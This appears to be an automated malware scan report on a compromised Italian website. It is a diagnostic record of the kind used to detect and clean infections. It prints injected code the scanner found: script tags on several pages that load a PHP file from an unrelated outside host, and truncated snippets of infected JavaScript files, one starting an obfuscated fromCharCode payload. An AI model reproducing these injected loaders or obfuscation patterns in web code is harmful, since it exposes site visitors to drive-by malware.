Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gruppocartagine.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://gruppocartagine.com/ | 200 OK Content-Length: 8713 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://jobboerse.markt-wartenberg.de/mK84FQk7.php?id=52850900"></script> | ||
http://gruppocartagine.com/js/jquery-1.6.3.min.js | 200 OK Content-Length: 173287 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(a,b){function cu(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cr(a){if(!cg[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){ch||(ch=c.createElement("iframe"),ch.frameBorder=ch.width=ch.height=0),b.appendChild(ch);if(!ci||!ch.createElement)ci=(ch.contentWindow||ch.contentDocument).document,ci.write((c.compatMode==="CSS1Compat"?"<!doctype html>":"")+"<html><body>"),ci.close();d=c /*/8f4d8e*/ /*/0f2490*/ Antivirus reports:
| ||
http://gruppocartagine.com/js/cufon-yui.js | 200 OK Content-Length: 21446 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&& /*/8f4d8e*/ /*/0f2490*/ Antivirus reports:
| ||
http://gruppocartagine.com/js/cufon-replace.js | 200 OK Content-Length: 3305 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Cufon.replace('.menu li a, h3, h4, .support, h1 a, .button, .button-2', { fontFamily: 'NewsGoth BT', hover:true }); ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v=123;vzs=0;try{document;}catch(q){vzs=1;}if Antivirus reports:
| ||
http://gruppocartagine.com/js/NewsGoth_BT_400.font.js | 200 OK Content-Length: 18946 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Cufon.registerFont({"w":216,"face":{"font-family":"NewsGoth BT","font-weight":400,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 5 3 2 2 3 2 2 4","ascent":"288","descent":"-72","x-height":"3","bbox":"-15 -283 340 85","underline-thickness":"18.6328","underline-position":"-24.9609","unicode-range":"U 0020-U 007E"},"glyphs":{" ":{"w":108},"!":{"d":"46,-83r-8,-177r34,0r-7,177r-19,0xm38,0r0,-41r35,0r0,41r-35,0","w":111},"\"":{"d":"87,-252r0,97r-21,0r0,-97r21,0xm37,-252r0,97r-20,0r0,-97 /*/8f4d8e*/ /*/0f2490*/ Antivirus reports:
| ||
http://gruppocartagine.com/js/FF-cash.js | 200 OK Content-Length: 3566 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if($.browser.mozilla||$.browser.opera) (function(){ window.addEventListener('pageshow', PageShowHandler, false); window.addEventListener('unload', UnloadHandler, false); function PageShowHandler() { window.addEventListener('unload', UnloadHandler, false); } function UnloadHandler() { window.removeEventListener('beforeunload', UnloadHandler, false); } })() Antivirus reports:
| ||
http://gruppocartagine.com/js/script.js | 200 OK Content-Length: 6513 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) $(document).ready(function() { $(".list-services .tooltips").easyTooltip(); }); $(document).ready(function(){ var slideShow = $('#slideShow'), ul = slideShow.find('ul'), li = ul.find('li'), cnt = li.length; updateZindex(); if($.support.transform){ li.find('img').css('rotate',function(i){ return (-90*i) 'deg'; }); slideShow.bind('rotateContainer',function(e,direction,degrees){ Antivirus reports:
| ||
http://gruppocartagine.com/js/jquery.equalheights.js | 200 OK Content-Length: 3656 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($){$.fn.equalHeights=function(minHeight,maxHeight){tallest=(minHeight)?minHeight:0;this.each(function(){if($(this).height()>tallest){tallest=$(this).height()}});if((maxHeight)&&tallest>maxHeight)tallest=maxHeight;return this.each(function(){$(this).height(tallest)})}})(jQuery) $(window).load(function(){ if($(".maxheight").length){ $(".maxheight").equalHeights()} }) $(window).load(function(){ if($(".maxheight2").length){ $(".maxheight2").equ Antivirus reports:
| ||
http://gruppocartagine.com/js/jquery.easing.1.3.js | 200 OK Content-Length: 11287 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.easing['jswing'] = jQuery.easing['swing']; jQuery.extend( jQuery.easing, { def: 'easeOutQuad', swing: function (x, t, b, c, d) { return jQuery.easing[jQuery.easing.def](x, t, b, c, d); }, easeInQuad: function (x, t, b, c, d) { return c*(t/=d)*t b; }, easeOutQuad: function (x, t, b, c, d) { return -c *(t/=d)*(t-2) b; }, easeInOutQuad: function (x, t, b, c, d) { if ((t/=d/2) < 1) return c/2*t*t b; retur Antivirus reports:
| ||
http://gruppocartagine.com/js/tms-0.3.js | 200 OK Content-Length: 14945 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($,undefined){ var _TMS=window._TMS=$.fn._TMS=function(_){ _=_||{} _=$.extend(clone(_TMS),_TMS.presets[_.preset],_) _.init.call(_.me=_.holder=this,_) return _.me.data({opt:_}) } $.extend(_TMS,{ etal:'<div></div>', items:'.items>li', pic:'pic', mask:'mask', paginationCl:'pagination', currCl:'current', pauseCl:'paused', bannerCl:'banner', numStatusCl:'numStatus', 339810*/ Antivirus reports:
| ||
http://gruppocartagine.com/js/tms_presets.js | 200 OK Content-Length: 21835 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function ($, undefined) { $.extend(_TMS, { presets:{ zoomer:{"reverseWay":false,"duration":"1000","interval":"1","blocksX":"1","blocksY":"1","easing":"","way":"lines","anim":"zoomer",k:1.8,crds:{bottom:0,right:0}}, fadeThree:{"reverseWay":false,"duration":"1000","interval":"1","blocksX":"1","blocksY":"1","easing":"","way":"lines","anim":"fadeThree"}, simpleFade:{"reverseWay":false,"duration":"1000","interval":"1","blocksX":"1","blocksY":"1","easing":"","way":" Antivirus reports:
| ||
http://gruppocartagine.com/js/easyTooltip.js | 200 OK Content-Length: 5006 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { $.fn.easyTooltip = function(options){ var defaults = { xOffset: 10, yOffset: 25, tooltipId: "easyTooltip", clickRemove: false, content: "", useElement: "" }; var options = $.extend(defaults, options); var content; this.each(function() { var title = $(this).attr("title"); $(this).hover(function(e){ content = (options.con Antivirus reports:
| ||
http://gruppocartagine.com/index.html | 200 OK Content-Length: 8713 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://jobboerse.markt-wartenberg.de/mK84FQk7.php?id=52850900"></script> | ||
http://gruppocartagine.com/services.html | 200 OK Content-Length: 7571 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://jobboerse.markt-wartenberg.de/mK84FQk7.php?id=52850904"></script> | ||
http://gruppocartagine.com/staff.html | 200 OK Content-Length: 5308 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://jobboerse.markt-wartenberg.de/mK84FQk7.php?id=52850907"></script> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gruppocartagine.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Jan 2015 11:29:03 GMT
Accept-Ranges: bytes
Server: Apache
Content-Language: it
Content-Length: 8713
Content-Type: text/html
Last-Modified: Fri, 28 Feb 2014 08:34:34 GMT
...8713 bytes of data.
GET / HTTP/1.1
Host: gruppocartagine.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Jan 2015 11:29:03 GMT
Accept-Ranges: bytes
Server: Apache
Content-Language: it
Content-Length: 8713
Content-Type: text/html
Last-Modified: Fri, 28 Feb 2014 08:34:34 GMT
...8713 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: gruppocartagine.com
Referer: http://www.google.com/search?q=gruppocartagine.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gruppocartagine.com
Referer: http://www.google.com/search?q=gruppocartagine.com
Result:
The result is similar to the first query. There are no suspicious redirects found.